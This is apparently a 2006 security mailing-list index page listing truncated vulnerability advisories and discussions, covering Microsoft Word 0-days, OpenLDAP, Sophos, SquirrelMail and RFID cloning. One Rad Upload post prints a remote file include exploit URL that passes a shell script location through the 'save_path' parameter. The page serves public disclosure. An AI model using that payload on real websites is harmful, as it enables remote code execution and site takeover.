|
|
Colapse all |
Post message
ZDI-06-047: Microsoft Visual Studio WmiScriptUtils.dll Cross-Zone Scripting Vulnerability 2006-12-12 zdi-disclosures 3com com Re: [fuzzing] OWASP Fuzzing page 2006-12-12 Joxean Koret (joxeankoret yahoo es) Wow! That's fun! The so called "Word 0 day" flaw also affects OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool with the file: joxean@joxeankoret $ abiword 12122006-djtest.doc ** (AbiWord-2.2:24313): WARNING **: Invalid seek ** (AbiWord-2.2:24313): WARNING **: Invalid seek * [ more ] [ reply ] ZDI-06-045: Sophos Anti-Virus CPIO Archive Parsing Buffer Overflow Vulnerability 2006-12-12 zdi-disclosures 3com com ZDI-06-045: Sophos Anti-Virus CPIO Archive Parsing Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-045.html December 12, 2006 -- CVE ID: CVE-2006-6335 -- Affected Vendor: Sophos -- Affected Products: All versions of Sophos Anti-Virus < v2.40 scanning e [ more ] [ reply ] rPSA-2006-0231-1 squirrelmail 2006-12-12 rPath Update Announcements (announce-noreply rpath com) rPath Security Advisory: 2006-0231-1 Published: 2006-12-12 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Weakness Updated Versions: squirrelmail=/conary.rpath.com@rpl:devel//1/1.4.9a-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cv [ more ] [ reply ] rPSA-2006-0230-1 evince 2006-12-12 rPath Update Announcements (announce-noreply rpath com) rPath Security Advisory: 2006-0230-1 Published: 2006-12-12 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: evince=/conary.rpath.com@rpl:devel//1/0.4.0-10.2-1 References: http://www.cve.mitre.org/cgi-b [ more ] [ reply ] [SBDA] SiteKiosk - FileSystem Access 2006-12-11 Brett Moore (brett moore security-assessment com) Still time before Christmas. ======================================================================== = SiteKiosk - FileSystem Access = = Vendor Website: = http://www.sitekiosk.com/ = = Affected Software: = SiteKiosk < 6.5.150 = = Public disclosure on Tuesday December 12, 2006 ============= [ more ] [ reply ] OpenLDAP kbind authentication buffer overflow 2006-12-12 Solar Eclipse (solareclipse phreedom org) There is a remotely exploitable buffer overflow in the Kerberos KBIND authentication code in the OpenLDAP slapd server. The vulnerability is in the krbv4_ldap_auth function in servers/slapd/kerberos.c. This function processes LDAP bind requests that specify the LDAP_AUTH_KRBV41 authentication metho [ more ] [ reply ] Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability 2006-12-12 rko thelegendkiller gmail com *^* Rad Upload Version 3.02 Remote File Include Vulnerability *^* Source: http://www.radinks.com/downloads/raduploadlite.zip *^* Vulnerable C0de On Line 39 In upload.php : if(isset($save_path) && $save_path!="") *^* (EXploit) http://[victim]/[directory]/upload.php?save_path=[sh3ll]? *^* Fou [ more ] [ reply ] [ GLSA 200612-09 ] MadWifi: Kernel driver buffer overflow 2006-12-11 Raphael Marichez (falco gentoo org) [ GLSA 200612-05 ] KOffice shared libraries: Heap corruption 2006-12-10 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Secunia Research: AOL CDDBControl ActiveX Control"SetClientInfo()" Buffer Overflow 2006-12-11 Secunia Research (remove-vuln secunia com) [ MDKSA-2006:227 ] - Updated kdegraphics packages fix EXIF vulnerability 2006-12-11 security mandriva com RFID access control tokens widely open to cloning 2006-12-11 Adam Laurie (adam laurie thebunker net) Too many systems to itemize here rely on the 'unique ID' of an RFID token to grant access to a system or building, and, in the case that these tokens are based on 125kHz or 134.2kHz standard tags, many of them may be vulnerable to relatively simple cloning attacks. In a way this is nothing new - [ more ] [ reply ] Re: LS-20060908 - Computer Associates BrightStor ARCserve Backup 2006-12-11 Williams, James K (James Williams ca com) The newest Word flaw is due to malformed data structure handling 2006-12-11 Juha-Matti Laurio (juha-matti laurio netti fi) (2 replies) Related to the newest MS Word 0-day http://blogs.technet.com/msrc/archive/2006/12/10/new-report-of-a-word-ze ro-day.aspx US-CERT Vulnerability Note VU#166700 released today lists the following new technical detail: "Microsoft Word fails to properly handle malformed data structures allowing memory c [ more ] [ reply ] Re: The newest Word flaw is due to malformed data structure handling 2006-12-12 Dave \No, not that one\ Korn (davek_throwaway hotmail com) Re: The newest Word flaw is due to malformed data structure handling 2006-12-12 Alexander Sotirov (asotirov determina com) [ GLSA 200612-10 ] Tar: Directory traversal vulnerability 2006-12-11 Matthias Geerdsen (vorlon gentoo org) Re: LS-20061001 - Computer Associates BrightStor ARCserve Backup 2006-12-11 Williams, James K (James Williams ca com) [ GLSA 200612-07 ] Mozilla Firefox: Multiple vulnerabilities 2006-12-10 Raphael Marichez (falco gentoo org) [ GLSA 200612-06 ] Mozilla Thunderbird: Multiple vulnerabilities 2006-12-10 Raphael Marichez (falco gentoo org) Secunia Research: MailEnable IMAP Service Buffer OverflowVulnerability 2006-12-11 Secunia Research (remove-vuln secunia com) looking for security community input 2006-12-10 Gadi Evron (ge linuxbox org) Hi guys. This January a couple hundred people from the net-ops world, anti virus, anti spam, law enforcement, etc. are getting together. I'd appreciate if any of you can send me input (off list, if not relevant to generate discussion) on what the security community at large, rather than just the [ more ] [ reply ] Re: Another, different MS Word 0-day vulnerability reported 2006-12-10 Juha-Matti Laurio (juha-matti laurio netti fi) One of the links in previous message was erroneous, because MSRC Blog hyperlink pointed to the wrong URL. Correction follows: Microsoft has confirmed that it is a different vulnerability than this issue reported earlier this week: http://www.microsoft.com/technet/security/advisory/929433.mspx - J [ more ] [ reply ] Another, different MS Word 0-day vulnerability reported 2006-12-10 Juha-Matti Laurio (juha-matti laurio netti fi) New vulnerability in Microsoft Word has been reported. More details available at SANS Internet Storm Center Diary: http://isc.sans.org/diary.php?storyid=1925 Microsoft has confirmed that it is a different vulnerability than this issue reported earlier this week: http://www.microsoft.com/security/ms [ more ] [ reply ] shopsite advisory 2006-12-10 DoZ hackerscenter com Hackers Center Security Group (http://www.hackerscenter.com/) Doz's Security Advisory Desc: ShopSite Shopping Cart Multiple XSS Risk: Medium ShopSite? is the easiest-to-use shopping cart software for small to medium-sized businesses. ShopSite ecommerce shopping cart is one of the most user-frien [ more ] [ reply ] Several updates in Microsoft Word 0-day (CVE-2006-5994) FAQ document 2006-12-10 Juha-Matti Laurio (juha-matti laurio netti fi) Several updates have been done to "Microsoft Word 0-day Vulnerability FAQ - December 2006, CVE-2006-5994" document during the weekend. -added information about AV vendor protection -added information about the state of Internet threat meters -added several reference hyperlinks -detailed information [ more ] [ reply ] |
|
Privacy Statement |
Scripting Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-047.html
December 12, 2006
-- CVE ID:
CVE-2006-4704
-- Affected Vendor:
Microsoft
-- Affected Products:
Visual Studio 2005 Standard Edition
Visu
[ more ] [ reply ]